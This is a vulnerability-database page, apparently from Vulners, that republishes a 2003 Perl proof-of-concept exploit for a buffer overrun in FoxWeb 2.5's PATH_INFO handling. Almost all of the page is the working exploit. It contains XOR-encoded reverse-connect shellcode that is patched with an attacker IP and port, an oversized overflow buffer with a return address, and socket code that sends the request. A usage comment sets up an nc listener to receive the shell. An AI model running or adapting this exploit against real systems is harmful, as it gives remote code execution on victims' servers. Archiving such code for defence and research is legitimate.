Vulners
Lucene search
FoxWeb 2.5 - PATH_INFO Remote Buffer Overrun
source: https://www.securityfocus.com/bid/8547/info
FoxWeb is prone to a remotely exploitable buffer overrun vulnerability. This is due to insufficient bounds checking of user-supplied PATH_INFO data to the Foxweb CGI and ISAPI extension. Successful exploitation would permit a remote attacker to execute arbitrary code in the context of the software.
#!/usr/bin/perl
#
# proof of concept foxweb 2.5 (http://www.foxweb.com)
# by pokleyzz <[email protected]>
#
# 06-27-2003
#
# usage:
# # nc -vv -l -p <local port>
# ...
# # ./bazooka_penaka.pl <target host> <target port> <local ip> <local port> [foxweb.dll path] [ret]
#
# kau persis musang berbulu ayam ..
#
# Greet:
# tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, kerengge_kurus and d'scan clan.
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
use IO::Socket;
my $host = "127.0.0.1";
my $port = 80;
my $musang = "/scripts/foxweb.dll";
my $rawret = "77e127bd"; # user32.dll = 0x77e127bd win2k sp3
my $conn;
my $ret;
my $xip;
my $xport;
if ($#ARGV < 3){
print "[x] foxweb 2.5 exploit for windows \n\tby pokleyzz of d' scan clan <[email protected]>\n\n";
print "Usage: \n bazooka_penaka.pl <target host> <target port> <local ip> <local port> [foxweb.dll path] [ret]\n";
print "kau persis musang berbulu ayam ..\n";
exit;
}
$host = $ARGV[0];
$port = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
if ($ARGV[4]){
$musang = $ARGV[4];
}
if ($ARGV[5]){
$rawret = $ARGV[5];
}
## start function
sub string_to_ret {
my $rawret = $_[0];
if (length($rawret) != 8){
print $rawret;
die "[*] incorrect return address ...\n ";
} else {
$ret = chr(hex(substr($rawret, 6, 2)));
$ret .= chr(hex(substr($rawret, 4, 2)));
$ret .= chr(hex(substr($rawret, 2, 2)));
$ret .= chr(hex(substr($rawret, 0, 2)));
}
}
sub ip_to_shellcode {
my $sip = $_[0];
split /\./,"$sip" ;
@ar_ip = @_;
if ($#ar_ip < 3) {
die "[*] incorrect local ip ...\n ";
}
$xip = sprintf("%%%.2x%%%.2x%%%.2x%%%.2x" ,int($ar_ip[0]) ^ 0x96 ,int($ar_ip[1]) ^ 0x96 ,int($ar_ip[2]) ^ 0x96 ,int($ar_ip[3]) ^ 0x96 );
}
sub port_to_shellcode {
my $sport = int($_[0]);
if ($sport > 65535 ) {
die "[*] incorrect port number ...\n ";
}
$xport = sprintf("%%%.2x%%%.2x" ,($sport >> 0x08) ^ 0x96,($sport & 0x0000000ff) ^ 0x96);
}
## end function
# reverse connect shellcode by sk <[email protected]>
$shellcode = ""
."%EB%02%EB%05%E8%F9%FF%FF%FF%58%83%C0%1B%8D%A0%01"
."%FC%FF%FF%83%E4%FC%8B%EC%33%C9%66%B9%5C%01%80%30"
."%96%40%E2%FA%7E%F6%96%96%96%D1%F3%E2%C6%E4%F9%F5"
."%D7%F2%F2%E4%F3%E5%E5%96%DA%F9%F7%F2%DA%FF%F4%E4"
."%F7%E4%EF%D7%96%D5%E4%F3%F7%E2%F3%C6%E4%F9%F5%F3"
."%E5%E5%D7%96%D3%EE%FF%E2%C6%E4%F9%F5%F3%E5%E5%96"
."%E1%E5%A4%C9%A5%A4%96%C1%C5%D7%C5%E2%F7%E4%E2%E3"
."%E6%96%C1%C5%D7%C5%F9%F5%FD%F3%E2%D7%96%F5%F9%F8"
."%F8%F3%F5%E2%96%F5%FB%F2%96%CC%C4%2D%96%96%66%E1"
."%17%AD%DB%CC%06%96%E2%95%DD%7D%63%1D%E5%AA%95%65"
."%1D%E0%EE%95%65%1D%E8%B6%95%6D%1D%D8%82%C0%A5%56"
."%C1%C7%1D%A9%95%6D%1D%64%A5%5F%27%98%65%30%CF%C9"
."%E2%90%15%51%92%D6%74%7E%C8%1D%C0%B2%95%45%47%76"
."%95%54%A5%5F%F0%1D%9E%1D%D0%8A%95%55%57%77%94%95"
."%57%1D%86%95%45%C8%1D%68%A5%5F%27%95%7E%EA%96%96"
."%96%15%50%9A%C4%C0%69%C1%62%CC%1D%4E%A5%5F%27%95"
."%7E%FE%96%96%96%15%50%9E%C3%FE%97%97%96%96%69%C1"
."%62%A5%56%C6%C6%C6%C6%D6%C6%D6%C6%69%C1%6E%1D%4E"
."%F0%51%D3%96%94%96%F0%51%D3%94"
."PORT" # 2 char
."%51%D3%92"
."IP" # 4 char
."%FC%86%C3%C5%69%C1%6A%A5%5F%27%87%C1%1D"
."%6B%65%3D%C9%50%D3%96%D2%1F%CB%AA%1F%CB%AE%1F%CB"
."%D6%F0%51%D3%BA%97%97%1B%D3%D2%C6%C3%C7%C7%C7%D7"
."%C7%DF%C7%C7%C0%C7%69%C1%7A%C6%69%C1%66%1C%90%D0"
."%12%56%E3%6F%C7%C4%C0%C5%69%44%CC%CF%3D%74%78%55";
# port c6 96 = 0x5000 ^ 0x9696
# 96 c6
# ip BF 97 3E 56 = 192.168.1.41 ^ 0x96969696
# 56 3E 97 BF
# 127.0.0.1 = 7f000001
#$xip = "%56%3E%96%82"; # 192.168.0.20
&ip_to_shellcode($myip);
&port_to_shellcode($myport);
#$xip = "%82%96%";
#$xport = "%07%06"; #9090
$shellcode =~ s/IP/$xip/;
$shellcode =~ s/PORT/$xport/;
&string_to_ret($rawret);
$buffer .= "A" x 1671;
$buffer .= "\xeb\x0c\xeb\x0c"; # jmp short 0x0c
$buffer .= $ret;
$buffer .= "B" x 16;
$buffer .= $shellcode;
$request = ""
."GET $musang/$buffer HTTP/1.1\n"
."User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n"
."Host: $host:$port\n"
."Connection: Close\n\n";
print "[x] Connect to $host on port $port ...\n";
$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "[*] Can't connect to $host on port $port ...\n";
$conn-> autoflush(1);
print "[x] Sending exploit code ...\n";
print $conn $request;
print "[x] Exploit sent .. good luck :) ...\n";
#print $request;Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jun 2003 00:00Current
7.4High risk
Vulners AI Score7.4